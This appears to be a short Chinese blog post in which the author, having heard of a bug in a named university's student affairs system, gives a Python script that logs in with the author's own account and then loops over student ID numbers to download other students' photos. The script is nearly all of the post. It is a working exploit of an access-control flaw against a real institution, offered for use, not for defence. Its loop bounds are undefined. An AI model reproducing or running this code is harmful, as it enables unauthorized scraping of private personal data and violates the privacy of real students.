最近听同学说学工系统里面有个bug,试了一下还真有这么回事,就利用这个漏洞爬一下头像咯
1 import requests 2 from urllib import request 3 from lxml import etree 4 5 url = "http://ca.lsu.edu.cn/zfca/login" 6 headers = { 7 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"} 8 9 # 尝试先模拟发一次get请求 获取cookie 获取token 10 session = requests.session() 11 page_html = session.get(url=url, headers=headers).text 12 13 # print(page_html) 14 page_html = etree.HTML(page_html) 15 code = page_html.xpath("//*[@id=\"thetable\"]/div[7]/span[1]/input[1]/@value")[0] 16 print(code) 17 # 通过抓包获取到post登录请求时携带的参数 18 19 # 下面填上自己的用户名和密码即可 20 data = { 21 "useValidateCode": "0", 22 "isremenberme": "0", 23 "ip": "", 24 "username": "", 25 "password": "", 26 "losetime": "240", 27 "lt": code, 28 "_eventId": "submit", 29 "submit1": "" 30 } 31 32 # 模拟登录一下 获取cookie 再跳转页面 33 session.post(headers=headers, url=url, data=data) 34 url = "http://xggl.lsu.edu.cn/xgxt/stuPage.jsp?jsName=student&caUserName="+data['username'] 35 reponse = session.get(url=url, headers=headers).text 36 37 for i in range(start, end): 38 url = "http://xggl.lsu.edu.cn/xgxt/xsxx_xsgl.do?method=showPhoto&xh=%s" % str(i) 39 detail_page = session.get(url=url, headers=headers).content 40 with open("./image/%s.jpeg" % i, "wb") as file: 41 file.write(detail_page)